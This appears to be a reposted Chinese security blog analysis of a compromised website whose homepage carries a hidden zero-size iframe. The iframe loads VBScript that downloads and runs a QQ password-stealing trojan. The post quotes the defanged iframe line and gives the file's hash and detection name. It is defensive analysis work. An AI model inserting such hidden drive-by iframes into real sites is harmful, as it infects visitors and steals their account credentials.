一个被加入下载QQ盗号木马Trojan.PSW.QQPass.rie代码的网站

我不是女神ヾ 2024-02-17 13:47 19阅读 0赞

**endurer** 原创

2007-01-30 第**1**版

该网站首页被加入代码：  
/-------  
＜IFRAME src="hxxp://\*\*\*.v\*\*1\*8\*\*\*0.net/qq/" frameBorder=0 width=0 height=0＞＜/IFRAME＞  
\-------/

打开该URL，没有显示内容，但网页中的VBScript代码会利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 qq.exe，保存为 %temp%/svchost.exe 和 %temp%/svchost.vbs，然后利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。

qq.exe 采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 加壳。  
/-------  
文件说明符 : D:/test/qq.exe  
属性 : A---  
获取文件版本信息大小失败!  
创建时间 : 2007-1-30 20:28:33  
修改时间 : 2007-1-30 20:28:33  
访问时间 : 2007-1-30 20:32:49  
大小 : 33182 字节 32.414 KB  
MD5 : 2cb2c796f777cff18ed2bfcf06abad61  
\-------/

瑞星报为：**Trojan.PSW.QQPass.rie**  
瑞星升级报告：19.06.21版新增337个可查杀病毒  
[http://it.rising.com.cn/Channels/Anti\_Virus/Upgrade\_Report/2007-01-17/1169011706d39989.shtml][http_it.rising.com.cn_Channels_Anti_Virus_Upgrade_Report_2007-01-17_1169011706d39989.shtml]  
第19位。

[http_it.rising.com.cn_Channels_Anti_Virus_Upgrade_Report_2007-01-17_1169011706d39989.shtml]: http://it.rising.com.cn/Channels/Anti_Virus/Upgrade_Report/2007-01-17/1169011706d39989.shtml

发表评论取消回复

表情：

评论列表（有 0 条评论，19人围观）

还没有评论，来说两句吧...

相关阅读

相关一个被挂木马的政府网站

*endurer**　原创 2006-09-21　第**1**版该网站首页被加入代码： /-------- ＜script language="JavaS...

布满荆棘的人生/ 2024年04月20日 11:18/ 0 赞/ 55 阅读

相关魔兽网游盗号木马文件 s.exe 的一点分析

*endurer**　原创 2006-09-17　第**1**版 [![authorship.gif][] 某政府网站和某中央企业的网站被挂魔兽网游盗号木马][aut...

矫情吗；*/ 2024年04月20日 11:17/ 0 赞/ 58 阅读

相关 [09-06] 又一个下载木马的网站（第2版）

*endurer**　原创 2006-09-06　第**2**版 2006-09-02　第**1**版网站 hxxp://www.94l\*\*\*m.com...

痛定思痛。/ 2024年04月20日 11:16/ 0 赞/ 43 阅读

相关遭遇灰鸽子2006、魔兽盗号木马等

*endurer**　原创 2006-08-31 第**1**版有一位网友的电脑，双击桌面图标，显示出来的却是图标的属性窗口。瑞星实时监控也无法打开。使用Hi...

ゝ一世哀愁。/ 2024年04月20日 11:16/ 0 赞/ 62 阅读

相关又一个被挂木马的政府网站(第3版)

endurer　原创 2006-09-30　第 3版补充瑞星的反应。 2006-09-29　22:34:00 第 2版补充Kaspersky的回复。 2006

小灰灰/ 2024年03月17日 09:20/ 0 赞/ 40 阅读

相关遭遇Viking新变种、传奇、魔兽盗号木马等(第3版)

endurer 原创 2006-10-13 第3版补充 Kaspersky 对偶未上报的文件的反应 2006-10-09 第2版补充 Kaspersky 的反应 20

谁践踏了优雅/ 2024年03月04日 07:56/ 0 赞/ 76 阅读

相关抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马

endurer 原创 2007-05-08 第1版一位朋友，说他的电脑最近运行很慢，让偶帮忙检修。下载 pe\_xscan 扫描 log 并分析，发现如下可疑项：

骑猪看日落/ 2024年02月17日 13:55/ 0 赞/ 40 阅读

相关一个被加入下载QQ盗号木马Trojan.PSW.QQPass.rie代码的网站

endurer 原创 2007-01-30 第1版该网站首页被加入代码： /------- ＜IFRAME src="hxxp://\\\.v\\1\8\\

我不是女神ヾ/ 2024年02月17日 13:47/ 0 赞/ 20 阅读

相关一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站

endurer 原创 2006-12-06 第1版该网站首页末被加入代码： /-------- ＜iframe src=hxxp://www.z\z\\\yqr

客官°小女子只卖身不卖艺/ 2024年02月17日 13:44/ 0 赞/ 30 阅读

相关网站源文件被注入了iframe代码—ARP欺骗的木马病毒攻击

我就很纳闷，运行了4年的网站一直都好好的最近怎么出现病毒提示呢。职业习惯原因打开了网站的源代码查看，原来在网页源代码的头部被加入了iframe嵌套框架网页，该网页执行木马程序…

Myth丶恋晨/ 2022年04月01日 10:22/ 0 赞/ 192 阅读